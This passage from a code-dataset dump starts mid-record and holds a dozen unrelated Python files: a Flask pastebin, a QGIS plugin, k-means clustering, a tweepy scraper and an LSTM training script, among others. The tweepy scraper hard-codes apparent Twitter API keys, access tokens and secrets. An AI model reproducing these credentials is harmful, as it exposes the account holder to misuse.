0)","sub_path":"moses_firm.py","file_name":"moses_firm.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152746099","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nfrom icecream import ic\n\n\ndef get_jobs(cycles):\n jobs = []\n for c in cycles:\n qid = c.split(\".\")[-1].replace(\"o\", \"\")\n jobs.append(qid)\n return jobs\n\ndef check_status(f, sign):\n with open(f, 'r') as fh:\n info = fh.read()\n if sign in info:\n return True\n else:\n return False\n\ndef testcmd(command):\n import subprocess\n ret = subprocess.run(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding=\"utf-8\",timeout=1)\n if ret.returncode == 0:\n return True\n else:\n return False\n\n\ndef jobsrun(job):\n #user = os.system('whoami')\n command = 'qstat -j ' + str(job)\n result = testcmd(command)\n return result\n\n\ndef main():\n regx = sys.argv[1]\n sign = sys.argv[2]\n files = glob.glob(regx)\n\n for f 
in files:\n cycles = glob.glob(f + \".o*\")\n # not run yet\n if len(cycles) < 1:\n print(f\"perhaps {f} is not run\")\n os.system(f\"sel-qsub evo 5g 1 {f}\")\n else:\n jobs = get_jobs(cycles)\n running = []\n done = 0\n for j in jobs:\n stdout = f + \".o\" + j\n if check_status(stdout, sign): # job runs good and finished\n #print(f\"{f} is done by qid {j}\")\n done += 1\n else:\n # job is not done\n if jobsrun(j): # still running\n #print(f\"{f} is running by qid {j}\")\n running.append(j)\n else: # not running, and no good sign\n print(f\"{f} run failed in cycle {j}\")\n #os.system(\"rm {f}.e{j} {f}.o{j}\")\n\n if len(running) > 1:\n print(f\"BAD, shell {f} is running under multi jobs: {running}\")\n\n if len(running) == 0 and done == 0:\n print(f\"{f} run failed\")\n #os.system(\"qsub-sel evo 5g 1 {f}\")\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n sys.exit(f\"python3 {sys.argv[0]} regx|\\*.sh sign|done\")\n else:\n main()\n","sub_path":"Pyscript/qsub/checkJobRun.py","file_name":"checkJobRun.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633716315","text":"# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nimport unittest\nimport shutil\nimport os\nimport tempfile\nimport dashboards_bundlers.local_deploy as converter\nfrom os.path import join as pjoin\nfrom os.path import isdir, isfile, exists\nfrom jupyter_core.paths import jupyter_data_dir\n\n# Mock existence of declarative widgets\nDECL_WIDGETS_DIR = pjoin(jupyter_data_dir(), 'nbextensions/urth_widgets/')\nDECL_WIDGETS_JS_DIR = pjoin(DECL_WIDGETS_DIR, 'js')\nDECL_VIZ_DIR = pjoin(DECL_WIDGETS_DIR, 'components/urth-viz')\nDECL_CORE_DIR = pjoin(DECL_WIDGETS_DIR, 'components/urth-core')\nBOWER_COMPONENT_DIR = pjoin(jupyter_data_dir(), 'nbextensions/urth_widgets/urth_components/component-a')\n\nclass MockHandler(object):\n def __init__(self, notebook_dir):\n self.notebook_dir = notebook_dir\n self.settings = {\n 'base_url' : '/'\n }\n self.last_redirect = None\n self.tools = None\n\n def redirect(self, location):\n self.last_redirect = location\n\nclass TestLocalDeploy(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n os.makedirs(DECL_WIDGETS_JS_DIR)\n os.makedirs(DECL_CORE_DIR)\n os.makedirs(DECL_VIZ_DIR)\n os.makedirs(BOWER_COMPONENT_DIR)\n\n def setUp(self):\n self.tmp = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.tmp, ignore_errors=True)\n\n def test_bundle(self):\n '''Should bundle and redirect to the application output dzirectory.'''\n handler = MockHandler(self.tmp)\n converter.bundle(handler, 'test/resources/no_imports.ipynb')\n\n output_dir = pjoin(self.tmp, 'local_dashboards', 'no_imports')\n self.assertTrue(isdir(output_dir), 'app directory should exist')\n self.assertEqual(handler.last_redirect, '/files/local_dashboards/no_imports/index.html',\n 'redirect to application url')\n\n def test_bundle_index(self):\n '''Should write a valid index.html.'''\n converter.bundle_index(self.tmp, 'test/resources/no_imports.ipynb')\n self.assertTrue(isfile(pjoin(self.tmp, 'index.html')), 'index.html should exist')\n with open(pjoin(self.tmp, 'index.html')) as f:\n contents = f.read()\n self.assertIn('DOCTYPE', contents, 'should declare a DOCTYPE')\n self.assertIn('data-main=\"./static/main.js', contents, 'should load main.js script')\n self.assertIn(\"origin = window.location.origin\", contents, 'should use local notebook server for kernels')\n 
self.assertIn(\"tmpnb_mode = false\", contents, 'should not use tmpnb spawn API')\n self.assertIn(\"kernel_name = 'python3'\", contents, 'should use correct kernel')\n\n def test_bundle_web_static(self):\n '''Should write a static directory.'''\n converter.bundle_web_static(self.tmp)\n # Check path from converter\n self.assertTrue(isdir(pjoin(self.tmp, 'static', 'bower_components')), 'bower_components should exist')\n # Check file from converter\n self.assertTrue(isfile(pjoin(self.tmp, 'static', 'main.js')), 'main.js should exist')\n # Check path from extension source\n self.assertTrue(isdir(pjoin(self.tmp, 'static', 'dashboard-common')), 'dashboard-common should exist')\n\n def test_bundle_declarative_widgets(self):\n '''Should write declarative widgets to output.'''\n converter.bundle_declarative_widgets(self.tmp, 'test/resources/env.ipynb')\n self.assertTrue(exists(pjoin(self.tmp, 'static/urth_widgets')), 'urth_widgets should exist')\n self.assertTrue(exists(pjoin(self.tmp, 'static/urth_components')), 'urth_components should exist')\n\n def test_skip_declarative_widgets(self):\n '''Should not write declarative widgets to output.'''\n # Testing to make sure we do not add bower components if we do not need to\n converter.bundle_declarative_widgets(self.tmp, 'test/resources/no_imports.ipynb')\n self.assertFalse(exists(pjoin(self.tmp, 'static/urth_widgets')), 'urth_widgets should not exist')\n self.assertFalse(exists(pjoin(self.tmp, 'static/urth_components')), 'urth_components should not exist')\n","sub_path":"test/test_local_deploy.py","file_name":"test_local_deploy.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83855622","text":"# create a class and __init__\n\nclass Book():\n pass\n\nbook = Book()\nprint(book) # we get <__main__.Book object at 0x7fe3b9636a60>\n\n# When we say Book() we are instantiating a new object\n# This object iws assigned to the book variable\n# Printing it gives us the type and memory location\n\n# second method:\nprint(type(book)) # we get \n\n# Then...\nclass Book():\n def __init__(self, title):\n self.title = title\n \n# consider this the constructor, or the function that is invoked when we create a book.\n# self refers to the book being created \n# and we don't have to worry about passing that, it's implicit...\n# Title is passed in as an argument, and assigned to self.title (the title of the book)\n \n# methods\nclass Book():\n def __init__ (self, title, pages):\n self.title = title\n self.pages = pages\n \n def log(self):\n print(f\"{self.title} is {self.pages} pages long.\")\n \n def is_short(self):\n if self.pages < 100:\n return True\n \nbook = Book(\"are you my mother\", 72)\nbook.log()\n\n# prints out: are you my mother is 72 pages long.\n\n# class level variables\n\n# self refers to the object things are being invoked on,\n# When we create an object. 
__init__ assigns stuff to self\n# That allows each object to have attributes.\n\nclass Book():\n    favs = [] # class\n    \n    def __init__ (self, title, pages):\n        self.title = title\n        self.pages = pages\n    \n    def log(self):\n        print(f\"{self.title} is {self.pages} pages long.\")\n    \n    def is_short(self):\n        if self.pages < 100:\n            return True\n    \nbook = Book(\"are you my mother?\", 72) # title and number of pages\nbook2 = Book(\"The Digging-est Dog\", 72)\n\nBook.favs.append(book) # add books to the list\nBook.favs.append(book2)\n\nprint(Book.favs)\n\n#To save space we are combining the code for all three of these sections.\n\nclass Book():\n    favs = [] # class\n\n    def __init__(self, title, pages):\n        self.title = title\n        self.pages = pages\n\n    def is_short(self):\n        if self.pages < 100:\n            return True\n\n    #What happens when you pass object to print?\n    def __str__(self):\n        return f\"{self.title}, {self.pages} pages long\"\n\n    #What happens when you use ==?\n    def __eq__(self, other):\n        if(self.title == other.title and self.pages == other.pages):\n            return True\n\n    #It's appropriate to give something for __hash__ when you override __eq__\n    #This is the recommended way if mutable (like it is here):\n    __hash__ = None\n\n    #If it should be immutable, you could do something like this.\n    #This replaces __hash__ = None\n    def __hash__(self):\n        # xor with hash of attributes\n        return hash(self.title) ^ hash(self.pages)\n        #from Mastering Object-Oriented Python\n\n\nbook = Book(\"Are You My Mother\", 72)\nprint(book)\nequal_book = Book(\"Are You My Mother\", 72)\nprint(\"Are they considered equal?\", book == equal_book) # yep\nprint(\"Are they the same object?\", book is equal_book) # nope\nbook2 = Book(\"The Digging-est Dog\", 72)\n\nprint(hash(book), hash(book2))\n\nprint(\"old hash\", hash(book))\nbook.title = \"new\"\nprint(\"new hash\", hash(book)) # BAD!!!\n#Hashes shouldn't change\n","sub_path":"Caleb Curry/oopbasics.py","file_name":"oopbasics.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5368726","text":"#! 
/usr/bin/python\n\nimport matplotlib\nmatplotlib.use('Qt4Agg')\nimport pylab\nimport numpy\nimport sys\nimport imp\n\n# Simulation results\n\npref = sys.argv[0].replace('draw_rad_prof.py','')\n\nrawd = numpy.loadtxt(pref+'x_prof_initial.txt')\nxr0 = rawd[:,0]\ndr0 = rawd[:,1]\npr0 = rawd[:,2]\nvr0 = rawd[:,3]\ncr0 = rawd[:,4]\ntime = numpy.loadtxt(pref+'time.txt')\n\nxs0 = numpy.sort(xr0)\nids0 = numpy.argsort(xr0)\nds0 = [dr0[i] for i in ids0]\nps0 = [pr0[i] for i in ids0]\nvs0 = [vr0[i] for i in ids0]\ncs0 = [cr0[i] for i in ids0]\n\nrawd = numpy.loadtxt(pref+'x_prof_final.txt')\nxr = rawd[:,0]\ndr = rawd[:,1]\npr = rawd[:,2]\nvr = rawd[:,3]\ncr = rawd[:,4]\n\nxs = numpy.sort(xr)\nids = numpy.argsort(xr)\nds = [dr[i] for i in ids]\nps = [pr[i] for i in ids]\nvs = [vr[i] for i in ids]\ncs = [cr[i] for i in ids]\n\n# Analytic results\nxa = [x+time*(c+v) for x,v,c in zip(xs0,vs0,cs0)]\n\n# Show data\npylab.subplot(311)\npylab.plot(xs,ds,xa,ds0,xs0,ds0)\npylab.xlabel('r')\npylab.ylabel('Density')\n\npylab.subplot(312)\npylab.plot(xs,ps,xa,ps0,xs0,ps0)\npylab.xlabel('r')\npylab.ylabel('Pressure')\n\npylab.subplot(313)\npylab.plot(xs,vs,xa,vs0,xs0,vs0)\npylab.xlabel('r')\npylab.ylabel('Velocity')\npylab.legend(('Numeric','Analytic','Initial'))\n\npylab.show()\n","sub_path":"tests/newtonian/two_dimensional/simple_waves/draw_rad_prof.py","file_name":"draw_rad_prof.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32804945","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom rest_framework_nested import routers\n\nfrom .views import IndexView\nfrom authentication.views import AccountViewSet, UserView\nfrom jobs.views import JobViewSet, UserJobPostsViewSet, FreshJobsView\n\n\nrouter = routers.SimpleRouter(trailing_slash=False)\nrouter.register(r'users', AccountViewSet)\nrouter.register(r'jobs', JobViewSet, 'Job')\n\naccounts_router = routers.NestedSimpleRouter(\n router, r'users', lookup='account', trailing_slash=False\n)\naccounts_router.register(r'jobs', UserJobPostsViewSet)\n\nurlpatterns = patterns('',\n url(r'^api/v1/jobs/fresh', FreshJobsView.as_view()),\n url(r'^api/v1/', include(router.urls)),\n url(r'^api/v1/', include(accounts_router.urls)),\n url(r'^api/v1/me', UserView.as_view()),\n\n url(r'^auth/', include('rest_framework_social_oauth2.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url('^.*$', IndexView.as_view(), name='index'),\n)\n","sub_path":"dayjobs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198836915","text":"from qgis.PyQt.QtGui import *\nfrom qgis.PyQt.QtWidgets import *\nfrom qgis.PyQt.QtCore import *\nfrom qgis.utils import iface\n\nfrom qgis.core import *\n\nimport time\nfrom qgis.gui import QgsMapCanvas\n\nfrom . 
import resources, form, procedures, fileio, canvasLayer\n\n## Main class: LSTplugin\n\n\nclass LSTplugin(object):\n\n \"\"\"Main plugin object\"\"\"\n\n def __init__(self, iface):\n\n \"\"\"\n Initialiser\n \"\"\"\n\n self.iface = iface\n\n def initGui(self):\n\n \"\"\"\n Called when loaded\n Adds plugin option to menus\n \"\"\"\n\n self.action = QAction(\n icon=QIcon(\":plugins/LST_Plugin/icon.png\"),\n text=\"LST plugin\",\n parent=self.iface.mainWindow(),\n )\n self.action.triggered.connect(self.run)\n\n self.iface.addToolBarIcon(self.action)\n self.iface.addPluginToMenu(\"LST Plugin\", self.action)\n\n def unload(self):\n\n \"\"\"\n Called when plugin is unloaded\n Removes option from interface\n \"\"\"\n\n self.iface.removePluginMenu(\"LST Plugin\", self.action)\n self.iface.removeToolBarIcon(self.action)\n\n def run(self):\n\n \"\"\"\n Called when plugin asked to run\n Starts a UI instance, defined in form.py\n \"\"\"\n\n window = form.MainWindow(self.iface)\n window.show()\n\n\ndef displayOnScreen(resultStates, filer):\n\n \"\"\"\n Display generated outputs as layers on the interface\n \"\"\"\n\n resultNames = []\n for res in resultStates:\n resultNames.append(res[1])\n\n layers = dict()\n for i in range(6):\n if resultStates[i][0]:\n layers[resultNames[i]] = iface.addRasterLayer(\n filer.generateFileName(resultNames[i], \"TIF\"), resultNames[i]\n )\n return layers\n\nclass preprocess(QgsTask):\n\n def __init__(self, filePaths, resultStates, satType, parent):\n\n QgsTask.__init__(self, \"Inputs Processor\")\n\n self.filePaths = filePaths\n self.resultStates = resultStates\n self.satType = satType\n self.parent = parent\n\n self.bands = dict()\n self.filer = None\n self.error = None\n\n def run(self):\n\n \"\"\"\n Main processing element, called every time Go is pressed\n \"\"\"\n\n self.filer = fileio.fileHandler()\n self.parent.updateProgress(0, \"0 % Starting, setting optional out folder\")\n\n if(\"output\" in self.filePaths):\n self.filer.prepareOutFolder(self.filePaths[\"output\"])\n del self.filePaths[\"output\"]\n \n self.parent.updateProgress(5, \"5 % Loading files\")\n\n if \"zip\" in self.filePaths:\n self.bands = self.filer.loadZip(self.filePaths, self)\n self.satType = self.bands[\"sat_type\"]\n del self.bands[\"sat_type\"]\n else:\n self.bands = self.filer.loadBands(self.filePaths)\n \n self.parent.updateProgress(15, \"15% Files ready, checking for errors\")\n\n if self.bands[\"Error\"]:\n self.error = self.bands[\"Error\"]\n return True\n del self.bands[\"Error\"]\n return True\n \n def finished(self, results = None):\n\n if(not(results)):\n self.error = \"Aborted\"\n if(self.error):\n self.parent.setError(self.error)\n self.parent.updateProgress(20, \"20% Starting calculations\")\n\nclass postprocess(QgsTask):\n\n def __init__(self, proc_object, parent):\n\n QgsTask.__init__(self, \"Outputs Processor\")\n\n self.proc_object = proc_object\n self.parent = parent\n self.error = None\n \n def run(self):\n\n self.filer = self.proc_object.filer\n self.filer.saveAll(self.proc_object.results)\n self.parent.updateProgress(94, \"94% Files Saved\")\n return True\n\n def finished(self, results = None):\n\n if(not(results)):\n self.error = \"Aborted\"\n if(self.error):\n self.parent.setError(self.error)\n self.parent.done = True\n self.parent.updateProgress(95, \"95% Finished, Displaying Outputs\")\n\nclass CarrierTask(QgsTask):\n\n def __init__(self, form):\n QgsTask.__init__(self, \"LST plugin base task\")\n self.time = 0\n self.form = form\n self.error = None\n self.done = 
False\n self.notification = \"If you're still seeing this, something's gone very wrong\"\n \n def run(self):\n while(not(self.done) and not(self.error)):\n time.sleep(1)\n self.time = int(time.time() - self.form.start_time)\n self.setProgress(self.progress())\n return True\n \n def finished(self, result = None):\n\n self.setProgress(100)\n if(not(result)):\n self.error = \"Crash\"\n if(self.error):\n self.form.showError(self.error)\n self.form.endRun()\n \n def updateProgress(self, num, text):\n\n self.notification = text\n self.setProgress(num)\n \n def setError(self, msg):\n\n if(self.error):\n return\n self.error = msg\n self.done = True\n self.finished(True)\n","sub_path":"mainLST.py","file_name":"mainLST.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312214340","text":"from flask import Blueprint, render_template, redirect, url_for, make_response, abort\n\nimport mulli\n\nfrom . import forms\nfrom . import utils\n\nroot_page = Blueprint('root', __name__)\n\n\n@root_page.route('/', methods=('GET', 'POST'))\ndef index():\n form = forms.PasteForm()\n\n if form.validate_on_submit():\n try:\n paste_id = mulli.create_id(form.text.data)\n except ValueError:\n abort(500)\n\n try:\n utils.save_paste(paste_id, form.text.data)\n except RuntimeError:\n abort(500)\n\n return redirect(url_for('root.show_paste', paste_id=paste_id))\n\n return render_template('index.html', form=form)\n\n\n@root_page.route('/advanced', methods=('GET', 'POST'))\ndef advanced():\n form = forms.ExtendedPasteForm()\n\n if form.validate_on_submit():\n try:\n paste_id = mulli.create_id(form.text.data)\n except ValueError:\n abort(500)\n\n try:\n utils.save_paste(paste_id, form.text.data, form.validity.data, form.syntax.data)\n except RuntimeError:\n abort(500)\n\n return redirect(url_for('root.show_paste', paste_id=paste_id))\n\n return render_template('advanced.html', form=form)\n\n\n@root_page.route('/')\ndef show_paste(paste_id):\n try:\n paste = mulli.load_entry(paste_id)\n except KeyError:\n return render_template('not_found.html'), 404\n except ValueError:\n mulli.remove_entry(paste_id)\n return render_template('not_found.html'), 404\n else:\n paste_content = paste['content']\n paste_lexer = paste['lexer']\n return render_template('paste.html', paste_id=paste_id, paste_content=paste_content, paste_lexer=paste_lexer)\n\n\n@root_page.route('/raw/')\ndef raw(paste_id):\n try:\n paste = mulli.load_entry(paste_id)\n except KeyError:\n return render_template('not_found.html'), 404\n except ValueError:\n mulli.remove_entry(paste_id)\n return render_template('not_found.html'), 404\n else:\n paste_content = paste['content']\n response = make_response(paste_content)\n response.mimetype = 'text/plain'\n return response\n\n\n@root_page.route('/about')\ndef about():\n return render_template('about.html')\n","sub_path":"pycno/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56606731","text":"from django.urls import path\nfrom . 
import views\nfrom rest_framework.routers import DefaultRouter\n\nrouter = DefaultRouter()\nrouter.register('transaction', views.TransactionViewSet,\n basename='transaction')\n\nurlpatterns = [\n path('current_user', views.current_user),\n path('balance', views.BalanceList.as_view()),\n path('transactionlist', views.TransactionList.as_view()),\n path('users/', views.UserList.as_view()),\n]\n\n\nurlpatterns += router.urls\n","sub_path":"ripio-server/wallet/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503528994","text":"import pandas as pd\nimport random\nimport numpy as np\nimport numba\nimport time\n\ndata = 'vectors_plus.csv'\nvectors = pd.read_csv(data)\nlength = len(vectors)\n\nd_f_t = (vectors != 0).astype(int).sum(axis=0)\n\n\n@numba.jit\ndef divergence_k_l(a, b):\n d = a * np.log2(a / b)\n return sum(d)\n\n\ndef divergence_akl(a, b):\n lam = random.random()\n m = lam * a + (1 - lam) * b\n return lam * divergence_k_l(a, m) + (1 - lam) * divergence_k_l(b, m)\n\n\nclass Cluster(object):\n\n def __init__(self, o):\n self.center = o\n self.array = []\n\n def set_center(self, o):\n assert o in self.array\n self.array.append(self.center)\n self.array.remove(o)\n self.center = o\n\n def add_item(self, obj):\n assert obj not in self.array\n self.array.append(obj)\n\n def remove_item(self, obj):\n assert obj in self.array\n self.array.remove(obj)\n\n def update_center(self, dataset):\n distances = {}\n center_distance = 0\n # get the distances between the center and others\n for a in self.array:\n center_distance += divergence_akl(dataset.loc[self.center], dataset.loc[a])\n distances[center_distance] = self.center\n\n for a in self.array:\n distance = 0\n for b in self.array:\n distance += divergence_akl(dataset.loc[a], dataset.loc[b])\n distance += divergence_akl(dataset.loc[self.center], dataset.loc[a])\n distances[distance] = a\n index = distances[min(distances.keys())]\n if index != self.center:\n self.set_center(index)\n\n def format_print(self):\n print(\"Cluster center: {}, array: [ \".format(self.center), end=\"\")\n for a in self.array:\n print(\"{} \".format(a), end=\"\")\n print(\"].\")\n\n\ndef save_to_csv(clusters, name):\n df = pd.DataFrame()\n for cluster in clusters:\n s = pd.Series({\"center\": cluster.center, \"array\": cluster.array})\n df = df.append(s, ignore_index=True)\n df.to_csv(name)\n\n\ndef find(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return True\n else:\n for i in cluster.array:\n if i == obj:\n return True\n return False\n\n\ndef find_center(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return True\n return False\n\n\ndef find_index(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return clusters.index(cluster)\n else:\n for i in cluster.array:\n if i == obj:\n return clusters.index(cluster)\n return None\n\n\ndef k_means(dataset, k, func=divergence_akl, epoch=1, checkpoint=1):\n # TODO: use better method\n clusters = []\n random_list = random.sample(range(0, length), k)\n for i in range(k):\n cluster = Cluster(random_list[i])\n clusters.append(cluster)\n\n # initialize the clusters\n for i in range(length):\n if find(clusters, i):\n continue\n else:\n distances = [func(dataset.loc[i], dataset.loc[clusters[j].center]) for j in range(k)]\n index = distances.index(min(distances))\n clusters[index].add_item(i)\n\n # save_to_csv(clusters, 
\"result.csv\")\n for n in range(epoch):\n start_time = time.time()\n for cluster in clusters:\n cluster.update_center(dataset)\n for i in range(length):\n if find_center(clusters, i):\n continue\n distances = [func(dataset.loc[i], dataset.loc[clusters[j].center]) for j in range(k)]\n index = distances.index(min(distances))\n r_index = find_index(clusters, i)\n if index != r_index:\n clusters[r_index].remove_item(i)\n clusters[index].add_item(i)\n end_time = time.time()\n print(\n \"\\nepoch {}: There are {} clusters, these clusters are as follows. \"\n \"The time consumed is {}s\".format(n + 1,\n k,\n end_time - start_time))\n for cluster in clusters:\n cluster.format_print()\n\n if (n + 1) % checkpoint == 0:\n save_to_csv(clusters, \"results/result_{}.csv\".format(n + 1))\n\n\nif __name__ == '__main__':\n k_means(vectors, 5, divergence_akl, 100, 20)\n","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"567373586","text":"import tweepy\nimport pandas as pd\nimport os\nimport datetime as dt\n\n# API key: X4Y7Y04awoRF1MCyQa7GihgnP\n# API secret key: 1Df4QFiMAxSmDNx2mpFv1DSLx3CZgHwQWDC4eO3QG8T6vCXv4E\n# Bearer token: AAAAAAAAAAAAAAAAAAAAALg8HgEAAAAA39cREsdqUFaFKjLPI10LuDzSOdo%3D58W5NRZXsfjn9DT3s9kJBTuwqkPBnmxZpIdegJSfbfbpy6WYpC\n# Access token: 375970946-vtiEnm2V2cv7GehiKclmzglcOXODsiYk4NHAH6Ty\n# Access token secret: 4igL12gmSDv9hxmN9Uk87xKaMEbVUYLummFetGrLLHBT2\n\n\n# Authenticate to Twitter\ndef run(critera, quantity, language):\n auth = tweepy.OAuthHandler(\"X4Y7Y04awoRF1MCyQa7GihgnP\", \n \"1Df4QFiMAxSmDNx2mpFv1DSLx3CZgHwQWDC4eO3QG8T6vCXv4E\")\n auth.set_access_token(\"375970946-vtiEnm2V2cv7GehiKclmzglcOXODsiYk4NHAH6Ty\", \n \"4igL12gmSDv9hxmN9Uk87xKaMEbVUYLummFetGrLLHBT2\")\n api = tweepy.API(auth)\n # Realizamos la búsqueda y guardamos en listas la información de nuestro interés.\n test = []\n tweets = []\n username = []\n screen_name = []\n date = []\n hashtags = []\n results = {}\n for tweet in api.search(q=criteria, lang=language, rpp=500, count=quantity):\n tmp = tweet.entities['hashtags']\n test.append(tweet)\n tweets.append(tweet.text)\n username.append(tweet.user.name)\n screen_name.append('@'+tweet.user.screen_name)\n date.append(tweet.created_at)\n hashtags.append(tweet.entities['hashtags'])\n \n # Creamos un dataframe con la busqueda realizada.\n results = pd.DataFrame({'username':username, 'screen_name':screen_name, 'date':date, 'tweet':tweets, 'hashtags': hashtags})\n\n # Guardando los resultados en una carpeta de búsquedas\n actual_dir = os.getcwd()\n path = os.chdir(actual_dir)\n search_time = dt.datetime.now().strftime('%Y_%m_%d')\n save_directory = f'{criteria}-{search_time}'\n try:\n os.chdir(save_directory)\n _save_file(results)\n except Exception as e:\n print('Creando carpeta de busqueda.')\n os.mkdir(save_directory)\n os.chdir(save_directory)\n _save_file(results)\n\ndef _save_file(df):\n return df.to_csv(f'results-{dt.datetime.now().strftime(\"%Y_%m_%d\")}.csv')\n # Windows\n # results.to_excel('D:\\\\Projects\\\\tweetsScraper\\\\results.xlsx')\n\nif __name__ == \"__main__\":\n print('Programa que te devuelve la cantidad de tweets definida por ti, según tu criterio de búsqueda.')\n select = int(input(\"\"\"Selecciona el idioma de tu preferencia:\n 1. Español\n 2. 
Inglés\n \"\"\"))\n language = ''\n if select == 1:\n language = 'es'\n elif select == 2:\n language = 'en'\n else:\n print('Selección no válida')\n print('Se selecciona español por defecto')\n language = 'es'\n \n\n criteria = input('Qué deseas buscar en twitter? ')\n quantity = int(input('Cuántos tweets deseas obtener? '))\n run(criteria, quantity, language)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596756548","text":"#Problem:\n#You are given an array rectangles where rectangles[i] = [li, wi] represents the ith rectangle of length li and width wi.\n#You can cut the ith rectangle to form a square with a side length of k if both k <= li and k <= wi. For example, \n#if you have a rectangle [4,6], you can cut it to get a square with a side length of at most 4.\n#Let maxLen be the side length of the largest square you can obtain from any of the given rectangles.\n#Return the number of rectangles that can make a square with a side length of maxLen.\n\n#Solution:\ndef countGoodRectangles(rectangles):\n \"\"\"\n :type rectangles: List[List[int]]\n :rtype: int\n \"\"\"\n possibleSquares = []\n for i in range(len(rectangles)):\n possibleSquares.append(min(rectangles[i][0],rectangles[i][1]))\n return possibleSquares.count(max(possibleSquares))\n","sub_path":"greedy-algorithm/maxTriangle.py","file_name":"maxTriangle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352224241","text":"# import numpy as np\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom argparse import ArgumentParser\nfrom tqdm import tqdm\n\nfrom models import LanguageModel, BPCLoss\nfrom utils import (\n load_corpus, Voc, ContinuousTextDataset, TestDataset, train_path,\n valid_path)\n\n\ndef validation(model, dataset):\n model.eval()\n with torch.no_grad():\n total_loss = 0\n total_cnt = 0\n hidden = model.init_hidden(dataset.batch_size)\n for _, batch in enumerate(dataset):\n x_batch = torch.tensor(\n batch['one_hot'][:, : -1]).float()\n y_batch = torch.tensor(\n batch['idx'][:, 1:].long()).flatten()\n if torch.cuda.device_count() > 0:\n x_batch = x_batch.cuda()\n y_batch = y_batch.cuda()\n output, hidden = model(x_batch, hidden)\n loss = criterion(output, y_batch)\n total_loss += loss.item() * y_batch.size()[0]\n total_cnt += y_batch.size()[0]\n model.train()\n return total_loss / total_cnt\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\n '--path', help='save model to where', type=str, required=True)\n args = parser.parse_args()\n\n # parameters\n lr = 0.0005\n epochs = 5\n batch_size = 200\n clip = 0.05\n\n chunk_size = 20\n hidden_size = 512\n num_layers = 2\n dropout = 0.2\n\n # load dataset\n train_text = load_corpus(train_path)\n valid_text = load_corpus(valid_path)\n voc = Voc(train_text)\n\n train_dataset = ContinuousTextDataset(\n train_text, chunk_size, batch_size, voc)\n valid_dataset = ContinuousTextDataset(\n valid_text, chunk_size, batch_size, voc)\n\n # create model\n model = LanguageModel(\n voc.size(), hidden_size, voc.size(), dropout, num_layers)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n criterion = nn.CrossEntropyLoss()\n # criterion = BPCLoss()\n\n if torch.cuda.is_available() > 0:\n model = model.cuda()\n criterion = criterion.cuda()\n\n try:\n for epoch in 
range(epochs):\n with tqdm(total=len(train_dataset)) as pbar:\n pbar.write('Epoch %d/%d' % (epoch + 1, epochs))\n hidden = model.init_hidden(batch_size)\n for i_batch, batch in enumerate(train_dataset):\n x_batch = torch.tensor(\n batch['one_hot'][:, : -1]).float()\n y_batch = torch.tensor(\n batch['idx'][:, 1:]).long().flatten()\n if torch.cuda.is_available() > 0:\n x_batch = x_batch.cuda()\n y_batch = y_batch.cuda()\n output, hidden = model(x_batch, hidden)\n output = output.view((-1, voc.size()))\n loss = criterion(output, y_batch)\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n optimizer.step()\n pbar.update(1)\n pbar.set_postfix(loss='%.4f' % loss.item())\n\n train_loss = validation(model, train_dataset)\n valid_loss = validation(model, valid_dataset)\n\n pbar.set_postfix(\n loss='%.4f' % train_loss, val_loss='%.4f' % valid_loss)\n if not np.isnan(valid_loss):\n os.makedirs(os.path.dirname(args.path), exist_ok=True)\n torch.save(model, args.path)\n\n except KeyboardInterrupt:\n pass\n","sub_path":"HW3/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455174999","text":"\"\"\"Module for testing individual functions of basic operations\"\"\"\n\nimport unittest\nfrom unittest import TestCase\n\nimport customer_model as cm\nimport basic_operations as 